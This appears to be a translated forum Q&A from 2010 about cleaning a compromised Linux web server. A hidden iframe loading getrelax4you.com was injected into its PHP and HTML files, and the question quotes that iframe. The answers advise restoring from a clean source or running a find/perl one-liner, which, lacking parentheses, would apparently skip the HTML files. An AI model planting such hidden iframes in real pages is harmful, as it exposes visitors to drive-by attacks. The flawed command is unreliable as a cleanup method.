以下行已添加到我的 linux 服务器上的几乎所有 php 文件和一些 html 文件中 删除它而不损坏其他任何东西的命令是什么?
iframe qoluu='V5pEXGSm' src=' http://getrelax4you.com/in.cgi?7 ' width='98' height='407' style='display:none'>
上述行的开头和结尾有 < >
该命令会搜索所有文件夹吗?
2 回答
3
您的服务器已被入侵,只需从源代码存储库将站点文件恢复到干净的服务器上即可。
修复任何用户数据可能会更加棘手,您不能再信任数据库的内容,因此您必须非常小心。下次运气更好。
于 2010-06-24T05:52:55.443 回答
2
简化的解决方案,假设所有病毒代码都在一行:
find /www/directory -name '*.html' -o -name '*.php' -exec perl -i -ne 'print unless /getrelax4you\.com/' '{}' \;
简短说明:访问 /www/目录下的所有文件,扩展名为 html 或 php。使用 perl 通过逐字复制所有行到输出来编辑每个文件,除非它们包含字符串“getrelax4you.com”;被删除。
买者自负!在尝试之前进行备份;我可能错过了一些小细节。
于 2010-06-23T19:21:46.697 回答